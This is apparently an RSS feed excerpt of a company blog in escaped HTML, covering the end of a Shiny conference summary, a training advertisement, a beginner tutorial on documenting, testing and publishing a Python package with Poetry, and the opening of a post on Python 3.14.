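```

&lt;p&gt;Validating the input before it reaches the query, as the team did in their app, is a complementary second line of defence.&lt;/p&gt;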
&lt;h3 id="natalia-petersen---hackathon-to-streamline-the-national-disease-registration-service-cancer-treatments-shiny-appnhse-ndrsshiny-app-cancer-treatments-this-repository-is-for-the-production-of-the-ndrs-cancer-treatments-r-shiny-app"&gt;Natalia Petersen - &amp;ldquo;Hackathon to Streamline the National Disease Registration Service Cancer Treatments Shiny App&amp;rdquo; (repository: NHSE-NDRS/shiny-app-cancer-treatments)&lt;/h3&gt;
&lt;p&gt;Natalia from the National Disease Registration Service spoke about how her team used a hackathon day to
develop a Shiny app. She started with a background of the project, a publicly available dashboard which
presents treatment data for various forms of cancer treatment. She displayed the previous iteration
of the dashboards (one for demographics and one for alliance) with a &amp;ldquo;retro&amp;rdquo; UI.&lt;/p&gt;
&lt;p&gt;She spoke about areas of improvement they targeted for the dashboards like combining the dashboards,
removing repeated code and simplification of over-complicated logic. They had 4 tasks, 4 hours and 4
analysts to tackle the issues. She spoke about successes of the session and also what could have improved
it, like dedicated &amp;ldquo;mop-up&amp;rdquo; time. To finish Natalia showed what the new app looked like and gave
an overview of the improvements made.&lt;/p&gt;
&lt;h3 id="andreas-wolfsbauer---enhancing-epidemiological-surveillance-with-a-shiny-application-for-standardized-data-analysis"&gt;Andreas Wolfsbauer - &amp;ldquo;Enhancing Epidemiological Surveillance with a Shiny Application for Standardized Data Analysis&amp;rdquo;&lt;/h3&gt;
&lt;p&gt;Andreas is a data scientist at the Austrian Agency for Health and Food Safety, in the Institute for
Surveillance &amp;amp; Infectious Disease Epidemiology. He showed the Shiny application he has developed
for standardised data analysis. The app has two components, the first is a dashboard where users
can load the disease data then filter on year, state and age group. The second part of the app
is an analysis page where they can filter the data and download or visualise the data.&lt;/p&gt;
&lt;p&gt;Andreas spoke about issues with the app, such as its reliance on Excel for the data, which he
worked around by running a scheduled job each morning to preload the data. He also spoke about constraints within the organisation,
with policies limiting access to tools like Docker and ShinyProxy. Instead, he turned to Shiny Server,
deployed 3 instances of the app and wrote a gateway app which handles load balancing across the
instances. He closed his talk with a list of features he would like to experiment with or
add to the app in the future.&lt;/p&gt;
&lt;h2 id="what-happens-next"&gt;What happens next?&lt;/h2&gt;
&lt;p&gt;Next year, we’re excited to host the very first &lt;strong&gt;AI In Production&lt;/strong&gt;!
Join us on June 4th and 5th in Newcastle Upon Tyne for an inspiring lineup of industry-leading
speakers and hands-on workshops. Grab your tickets now on
&lt;a href="https://www.eventbrite.co.uk/e/ai-in-production-registration-1777831163869?aff=ebdssbcategorybrowse" rel="external"&gt;Eventbrite&lt;/a&gt;
to take advantage of the &lt;strong&gt;Super Early Bird&lt;/strong&gt; discount before it’s gone.&lt;/p&gt;
&lt;h2 id="sponsors"&gt;Sponsors&lt;/h2&gt;
&lt;!-- Posit --&gt;
&lt;a href="https://posit.co/"&gt;
&lt;img
src="posit-logo.png"
style="width: 285px; display: block; margin-left: auto; margin-right: auto; margin-top: 1em"
alt="Posit logo"
/&gt;
&lt;/a&gt;
&lt;br&gt;
&lt;!-- RSS --&gt;
&lt;a href="https://rss.org.uk/"&gt;
&lt;img
src="rss_logo.png"
style="width: 285px; display: block; margin-left: auto; margin-right: auto; margin-top: 1em"
alt="RSS logo"
/&gt;
&lt;/a&gt;
&lt;br&gt;
&lt;!-- ThinkR --&gt;
&lt;a href="https://thinkr.fr/"&gt;
&lt;img
src="thinkr-logo.png"
style="width: 285px; display: block; margin-left: auto; margin-right: auto; margin-top: 1em"
alt="Think-R logo"
/&gt;
&lt;/a&gt;
&lt;br&gt;
&lt;!-- Datacove --&gt;
&lt;a href="https://datacove.co.uk/"&gt;
&lt;img
src="datacove-logo.png"
style="width: 285px; display: block; margin-left: auto; margin-right: auto; margin-top: 1em"
alt="Datacove logo"
/&gt;
&lt;/a&gt;
&lt;br&gt;
&lt;!-- R Consortium --&gt;
&lt;a href="https://www.r-consortium.org/"&gt;
&lt;img
src="rconsortium-logo.png"
style="width: 285px; display: block; margin-left: auto; margin-right: auto"
alt="R Consortium logo"
/&gt;
&lt;/a&gt;
&lt;br&gt;
&lt;!-- Newcastle University Solve --&gt;
&lt;a href="https://www.ncl.ac.uk/maths-physics/engagement/nusolve/"&gt;
&lt;img
src="nu-solve_logo.png"
style="width: 285px; display: block; margin-left: auto; margin-right: auto; margin-top: 1em"
alt="NU Solve logo"
/&gt;
&lt;/a&gt;
&lt;br&gt;
&lt;!-- CRC Press --&gt;
&lt;a href="https://www.routledge.com/"&gt;
&lt;img
src="crc-press-logo.png"
style="width: 285px; display: block; margin-left: auto; margin-right: auto; margin-top: 1em"
alt="CRC Press logo"
/&gt;
&lt;/a&gt;
&lt;br&gt;
&lt;!-- NICD --&gt;
&lt;a href="https://www.nicd.org.uk/"&gt;
&lt;img
src="nicd_logo.png"
style="width: 285px; display: block; margin-left: auto; margin-right: auto"
alt="NICD logo"
/&gt;
&lt;/a&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/sip2025-shiny-conference-summary/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Elevate Your Data Skills with Jumping Rivers Training</title><link>https://www.jumpingrivers.com/blog/jr-elevate-training-2025-r-python-bayesian-statistics-machine-learning/</link><pubDate>Tue, 28 Oct 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/jr-elevate-training-2025-r-python-bayesian-statistics-machine-learning/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/jr-elevate-training-2025-r-python-bayesian-statistics-machine-learning/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/jr-elevate-training-2025-r-python-bayesian-statistics-machine-learning/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;In today’s data-driven world, strong analytical and programming skills are essential for success.
Whether you’re just starting your data journey or looking to expand your expertise, Jumping Rivers
offers training that combines real-world experience with interactive, practical learning.&lt;/p&gt;
&lt;h2 id="expert-led-hands-on-learning"&gt;Expert-Led, Hands-On Learning&lt;/h2&gt;
&lt;p&gt;At Jumping Rivers, our trainers are experienced data scientists and engineers who work daily on real
client projects. This means the skills you learn are grounded in real-world applications, not just theory.
Our courses blend live coding, demonstrations, and interactive exercises to ensure an engaging and
effective learning experience. Every participant receives:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Comprehensive PDF notes and scripts for continued learning.&lt;/li&gt;
&lt;li&gt;Live demonstrations and practical exercises.&lt;/li&gt;
&lt;li&gt;Guidance from a trainer, whether online or onsite.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Training is available both online and in-person, with flexible options for &lt;strong&gt;individual learners&lt;/strong&gt; or &lt;strong&gt;teams&lt;/strong&gt;.&lt;/p&gt;
&lt;h2 id="course-topics"&gt;Course Topics&lt;/h2&gt;
&lt;p&gt;Our training portfolio spans a wide range of topics, including:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;R for data analysis and reporting&lt;/li&gt;
&lt;li&gt;Python for data science and automation&lt;/li&gt;
&lt;li&gt;Git and version control&lt;/li&gt;
&lt;li&gt;Artificial Intelligence and Machine Learning fundamentals&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each course is designed to help participants apply new skills immediately to their work, with clear
examples and hands-on practice throughout.&lt;/p&gt;
&lt;h2 id="public-and-in-house-training"&gt;Public and In-House Training&lt;/h2&gt;
&lt;p&gt;Our public training programme offers scheduled courses open to all participants.
You can view our upcoming sessions here:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;https://www.jumpingrivers.com/training/public/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;For organisations looking to develop their teams, we also provide bespoke in-house training.
These sessions are fully customised to your organisation&amp;rsquo;s needs, workflows, and skill levels, ensuring that your team
gains the most relevant and practical insights possible.&lt;/p&gt;
&lt;p&gt;To discuss tailored courses for your organisation, contact &lt;a href="mailto:training@jumpingrivers.com" rel="external"&gt;training@jumpingrivers.com&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="why-train-with-jumping-rivers"&gt;Why Train with Jumping Rivers&lt;/h2&gt;
&lt;p&gt;With over 1,000 courses delivered worldwide, Jumping Rivers has built
a reputation for delivering training that is both impactful and accessible.
Our clients include NHS Scotland, Shell, Wessex Water, and the Royal Statistical
Society—organisations that trust us to develop their data capability.&lt;/p&gt;
&lt;p&gt;We also offer additional benefits such as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Discounts for group bookings and returning clients.&lt;/li&gt;
&lt;li&gt;Reduced rates for attendees of our events and conferences.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="take-the-next-step"&gt;Take the Next Step&lt;/h2&gt;
&lt;p&gt;Whether you’re advancing your own career or developing your team’s capabilities,
Jumping Rivers training provides the tools, confidence, and practical knowledge you need to succeed.&lt;/p&gt;
&lt;p&gt;Explore our public courses or reach out to discuss bespoke options:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;View upcoming training: &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;https://www.jumpingrivers.com/training/public/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Enquire about group training: &lt;a href="mailto:training@jumpingrivers.com" rel="external"&gt;training@jumpingrivers.com&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Invest in your growth with hands-on, expert-led training from Jumping Rivers and
take the next step in your data journey.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/jr-elevate-training-2025-r-python-bayesian-statistics-machine-learning/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Creating a Python Package with Poetry for Beginners Part2</title><link>https://www.jumpingrivers.com/blog/python-package-part-two/</link><pubDate>Thu, 23 Oct 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/python-package-part-two/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/python-package-part-two/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/python-package-part-two/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="intro"&gt;Intro&lt;/h2&gt;
&lt;p&gt;In the &lt;a href="https://www.jumpingrivers.com/blog/python-package/" rel="external"&gt;previous blog&lt;/a&gt; we
covered creating our package with Poetry, managing our development environment and
adding a function. In this blog post we&amp;rsquo;ll cover the next steps in package
development, including documentation, testing and how to publish to PyPI.&lt;/p&gt;
&lt;p&gt;Note: I am using my package as an example but not actually publishing it to PyPI.&lt;/p&gt;
&lt;h2 id="documentation"&gt;Documentation&lt;/h2&gt;
&lt;p&gt;When developing a package, documentation is one of the most important steps. It&amp;rsquo;s easy to
get carried away with the fun of writing packages and functions and forget to document them. There
are many reasons to write documentation, including:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Purpose:&lt;/strong&gt; It explains what the code does and why. Thinking about this as a developer
can often help with design.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Usability:&lt;/strong&gt; It helps users (and your future self) understand the code.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Maintenance:&lt;/strong&gt; It will make debugging and updates easier.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Standards:&lt;/strong&gt; All good packages have good documentation. It is one of the key metrics of
&lt;a href="https://www.jumpingrivers.com/litmus/" rel="external"&gt;Litmus&lt;/a&gt;, our package validation service.&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Need help with R package validation to unleash the power of open source? Check out the &lt;a href="https://www.jumpingrivers.com/litmus/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-python-package-part-2"&gt; Litmusverse suite of risk assessment tools&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="what-documentation-do-we-need"&gt;What Documentation Do We Need?&lt;/h3&gt;
&lt;h4 id="readme"&gt;README&lt;/h4&gt;
&lt;p&gt;A README file is a short, essential guide that explains your Python package at a glance. It typically includes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Project name and description: What the package does and why it’s useful.&lt;/li&gt;
&lt;li&gt;Installation instructions: How to install it (usually with pip).&lt;/li&gt;
&lt;li&gt;Usage examples: Simple code snippets showing how to get started.&lt;/li&gt;
&lt;li&gt;Features or documentation links: What’s included and where to learn more.&lt;/li&gt;
&lt;li&gt;License and contribution info: How others can use or contribute to the project.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In short, the README helps users understand, install, and use your package quickly.&lt;/p&gt;
&lt;p&gt;For a good example of a README file, instead of writing one for my package I&amp;rsquo;m going to point to
the &lt;a href="https://github.com/pandas-dev/pandas/blob/main/README.md" rel="external"&gt;pandas&lt;/a&gt; README.&lt;/p&gt;
&lt;h4 id="docstrings"&gt;Docstrings&lt;/h4&gt;
&lt;p&gt;Docstrings are short, embedded documentation inside your Python code that explain what functions, classes, or modules do. They typically include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Purpose: A brief description of what the function, class, or module does.&lt;/li&gt;
&lt;li&gt;Parameters: Names, types, and descriptions of inputs.&lt;/li&gt;
&lt;li&gt;Returns: The output type and what it is.&lt;/li&gt;
&lt;li&gt;Example usage (optional): A small code snippet showing how to use it.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In short, docstrings make your code understandable, help tools like &lt;code&gt;help()&lt;/code&gt; or IDEs
provide guidance, and serve as the basis for auto-generated API documentation.&lt;/p&gt;
&lt;p&gt;For a docstring example I am going to use my function &lt;code&gt;get_season_league&lt;/code&gt;.
Here, we are using the Sphinx markup language to document
the different input parameters and their datatypes, and
any returned values. See the &lt;a href="https://www.sphinx-doc.org/en/master/usage/domains/python.html#info-field-lists" rel="external"&gt;Sphinx documentation&lt;/a&gt; for further
information.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_season_league&lt;/span&gt;(league_id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;485842&amp;#34;&lt;/span&gt;):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; This function will take your league ID, map over all the members
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; of your league then return a DF with a week on week league table.
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; :type league_id: str
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; :param league_id: ID of the league you are targeting
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; :returns: DataFrame of the league&amp;#39;s week-on-week standings
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; &amp;#34;&amp;#34;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; api_url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://fantasy.premierleague.com/api/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="testing"&gt;Testing&lt;/h2&gt;
&lt;p&gt;Testing is another very important part of package development that has many benefits. Tests can be integrated
into version control CI pipelines, meaning you can run them every time you push changes to a remote Git repository. Some
of the benefits of testing are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Thinking about tests whilst writing functions will aid development&lt;/li&gt;
&lt;li&gt;Well-written tests will catch bugs early&lt;/li&gt;
&lt;li&gt;Tests help ensure consistency between releases&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There are lots of resources out there on writing tests for Python packages. We have two previous blogs
on &lt;a href="https://pytest.org/" rel="external"&gt;pytest&lt;/a&gt;: &lt;a href="https://www.jumpingrivers.com/blog/intro-to-pytest/" rel="external"&gt;an introductory blog&lt;/a&gt;
and &lt;a href="https://www.jumpingrivers.com/blog/python-testing-advanced/" rel="external"&gt;a more advanced one&lt;/a&gt;. There are
many testing frameworks available for Python, like
&lt;a href="https://docs.python.org/3/library/unittest.html" rel="external"&gt;unittest&lt;/a&gt;,
&lt;a href="https://docs.pytest.org/en/stable/index.html" rel="external"&gt;pytest&lt;/a&gt;, or
&lt;a href="https://docs.python.org/3/library/doctest.html" rel="external"&gt;doctest&lt;/a&gt; (which runs docstring-embedded examples as software tests). The type of testing you need
will often determine the framework you use.
The software literature makes distinctions between different types of tests: unit (which we will
focus on), integration, end to end, and acceptance tests. The distinction is based on the scope (how much of the software project is run/touched during the tests), isolation (do the tests rely on external services) and viewpoint (do the tests check features from a user&amp;rsquo;s perspective, or how the software works internally from a developer&amp;rsquo;s perspective).&lt;/p&gt;
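&lt;p&gt;As a minimal sketch of how &lt;code&gt;doctest&lt;/code&gt; works, the hypothetical helper below (&lt;code&gt;total_points&lt;/code&gt; is made up for illustration and is not part of my package) embeds two examples in its docstring. Assuming the file is run directly as a script, the examples are executed as tests:&lt;/p&gt;

```python
import doctest


def total_points(weekly_points):
    """
    Sum a list of weekly points (hypothetical helper for illustration).

    >>> total_points([69, 42, 57])
    168
    >>> total_points([])
    0
    """
    return sum(weekly_points)


if __name__ == "__main__":
    # Run every example found in this module's docstrings
    doctest.testmod()
```

&lt;p&gt;If you already use pytest, running it with the &lt;code&gt;--doctest-modules&lt;/code&gt; option should collect the same docstring examples alongside your other tests.&lt;/p&gt;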
&lt;h3 id="testing-my-package"&gt;Testing My Package&lt;/h3&gt;
&lt;p&gt;Thankfully my package only has one function so it will be very easy to write a test.&lt;/p&gt;
&lt;p&gt;To begin, I&amp;rsquo;ll create a test file, &lt;code&gt;tests/test_get_league.py&lt;/code&gt;. This follows the
convention of naming the test file &lt;code&gt;test_module_name&lt;/code&gt;. You may also see test files named
&lt;code&gt;test_function_name&lt;/code&gt;; this will depend on how large your modules are. The goal is for the naming to be
consistent, easy to understand and ideally split up based on size.&lt;/p&gt;
&lt;p&gt;I have added some simple tests for the class of the output, the columns returned and the first
event in my default data, as this will remain the same. I&amp;rsquo;m not going to go into detail on how
the tests work, as we have already covered this in the blogs mentioned above, but this is my test:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_get_season_league&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; output &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; get_season_league()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Test pandas DataFrame is produced&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;assert&lt;/span&gt; isinstance(output, pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrame)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Test columns are correct&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;assert&lt;/span&gt; list(output&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;columns) &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; [&lt;span style="color:#a5d6ff"&gt;&amp;#34;name&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;team_name&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;event&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;points&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Test first event as it will remain the same as the data grows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; first_event &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; output&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;query(&lt;span style="color:#a5d6ff"&gt;&amp;#34;name == &amp;#39;Osheen Macoscar&amp;#39; &amp;amp; event == 1&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;assert&lt;/span&gt; first_event[&lt;span style="color:#a5d6ff"&gt;&amp;#34;points&amp;#34;&lt;/span&gt;]&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;iloc[&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;69&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;I have written a very surface-level test here. My particular function is hard to test as
I&amp;rsquo;m calling an external API, meaning the returned object will differ each game-week. The API may also
go down, or its output may change, causing the test to fail even though my function hasn&amp;rsquo;t changed.
When a test touches an external resource, ideally I would set up a static response to test against (which I
could do for certain endpoints), but I can&amp;rsquo;t with my function as the output is supposed to change
throughout the season.&lt;/p&gt;
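&lt;p&gt;For an endpoint whose response can be frozen, a static response might look something like the sketch below. Everything here is an assumption made for illustration: &lt;code&gt;fetch_league_name&lt;/code&gt; is a hypothetical helper, the endpoint path and the payload are made up, and the request is made with the standard library rather than whatever my package uses. The idea is simply that &lt;code&gt;unittest.mock&lt;/code&gt; replaces the network call with a fixed payload, so the test no longer depends on the live API:&lt;/p&gt;

```python
import io
import json
import urllib.request
from unittest import mock

API_URL = "https://fantasy.premierleague.com/api/"


def fetch_league_name(league_id="485842"):
    """Hypothetical helper: return the league name from the API response."""
    # The endpoint path is an assumption made for this sketch
    url = f"{API_URL}leagues-classic/{league_id}/standings/"
    with urllib.request.urlopen(url) as response:
        payload = json.load(response)
    return payload["league"]["name"]


def test_fetch_league_name():
    # Static, made-up payload standing in for the live API
    fake_body = io.BytesIO(json.dumps({"league": {"name": "Test League"}}).encode())
    # Replace urlopen so that no network request is made during the test
    with mock.patch("urllib.request.urlopen", return_value=fake_body) as fake_urlopen:
        assert fetch_league_name("1") == "Test League"
    # The helper should have made exactly one (faked) request
    fake_urlopen.assert_called_once()
```

&lt;p&gt;Because the payload never changes, a test like this only checks how the function handles a known response. It would not notice if the real API changed its output.&lt;/p&gt;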
&lt;p&gt;Once we have written our tests, we can run &lt;code&gt;pytest&lt;/code&gt; from the top level of our package
to run the test(s), and it will report whether they have passed or failed.&lt;/p&gt;
&lt;h2 id="publishing-to-pypi"&gt;Publishing to PyPI&lt;/h2&gt;
&lt;p&gt;As I mentioned at the start of the blog, I am not publishing this package to PyPI. However,
I will show the helpful Poetry command that allows us to do it. Note there is also a
&lt;a href="https://test.pypi.org/" rel="external"&gt;TestPyPI&lt;/a&gt; that you can publish to first to ensure everything runs
smoothly.&lt;/p&gt;
&lt;p&gt;The main command for this is &lt;code&gt;poetry publish&lt;/code&gt;, but there are a few steps we need to take first.
You need to authenticate before you can publish. This can be set up by
adding your user-specific PyPI token to your config:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;poetry config pypi-token.pypi &amp;lt;token&amp;gt;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;After you have done this you are clear to publish and can do so with:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;poetry publish --build
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;The &lt;code&gt;--build&lt;/code&gt; flag at the end builds the package by creating the distributable
files (a .tar.gz and a .whl) inside the dist/ directory. This is required before publishing
the package.&lt;/p&gt;
&lt;h2 id="next-up"&gt;Next Up&lt;/h2&gt;
&lt;p&gt;This is where I am going to leave the series for now. We have looked at all the basics you need
when developing a Python package, from writing and documenting functions all the way to testing
and publishing the package. In the next iteration I may look at building out this package or
parallelising the function I&amp;rsquo;ve written, but it is not scheduled to be written anytime soon.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/python-package-part-two/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>What's new for Python in 2025?</title><link>https://www.jumpingrivers.com/blog/whats-new-py314/</link><pubDate>Thu, 16 Oct 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/whats-new-py314/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/whats-new-py314/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/whats-new-py314/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Python 3.14 was released on 7th October 2025. Here we summarise some
of the more interesting changes and some trends in Python development and data-science
over the past year. We will highlight the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;the colourful Python command-line interface;&lt;/li&gt;
&lt;li&gt;project-management tool &lt;code&gt;uv&lt;/code&gt;;&lt;/li&gt;
&lt;li&gt;free-threading;&lt;/li&gt;
&lt;li&gt;and a brief summary of other developments.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The &lt;a href="https://docs.python.org/3.14/whatsnew/3.14.html" rel="external"&gt;Python 3.14 release notes&lt;/a&gt;
also describe the changes to base Python.&lt;/p&gt;
&lt;h2 id="colourful-repl"&gt;Colourful REPL&lt;/h2&gt;
&lt;p&gt;At Jumping Rivers we have taught a lot of people to program in Python.
Throughout a programming career you get used to making, and learning
from, mistakes. The most common mistakes made in introductory
programming lessons may still trip you up in 10 years’ time: unmatched
parentheses, typos, missing quote symbols, unimported dependencies.&lt;/p&gt;
&lt;p&gt;Our Python training courses are presented using
&lt;a href="https://jupyter.org/" rel="external"&gt;Jupyter&lt;/a&gt;. Jupyter
notebooks have syntax highlighting that makes it easy to identify an
unfinished string, or a misspelled keyword.&lt;/p&gt;
&lt;p&gt;But most Python learners don’t use Jupyter (or other high-level
programming tools) on day one - they experiment with Python at the
command line. You can type “python” into your shell/terminal window and
start programming into the “REPL” (read-evaluate-print loop).&lt;/p&gt;
&lt;p&gt;Any effort to make the REPL easier to work with will be beneficial to
beginning programmers. So the introduction of syntax highlighting in the
Python 3.14 REPL is a welcome change.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-whats-new-py314"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="uv-and-package-development"&gt;&lt;code&gt;uv&lt;/code&gt; and package development&lt;/h2&gt;
&lt;p&gt;One of the big trends in Python development in 2025 is the rise of
the project management tool
&lt;a href="https://docs.astral.sh/uv/" rel="external"&gt;&lt;code&gt;uv&lt;/code&gt;&lt;/a&gt;. This is a Rust-based command-line tool
and can be used to initialise a package / project structure, to specify
the development and runtime environment of a project, and to publish a
package to PyPI.&lt;/p&gt;
&lt;p&gt;At Jumping Rivers, we have used &lt;code&gt;poetry&lt;/code&gt; for many of the jobs that &lt;code&gt;uv&lt;/code&gt;
excels at. Python is used for the data preparation tasks for
diffify.com, and we use
&lt;a href="https://python-poetry.org/" rel="external"&gt;&lt;code&gt;poetry&lt;/code&gt;&lt;/a&gt; to ensure that our developers each use
precisely the same package versions when working on that project (see our current
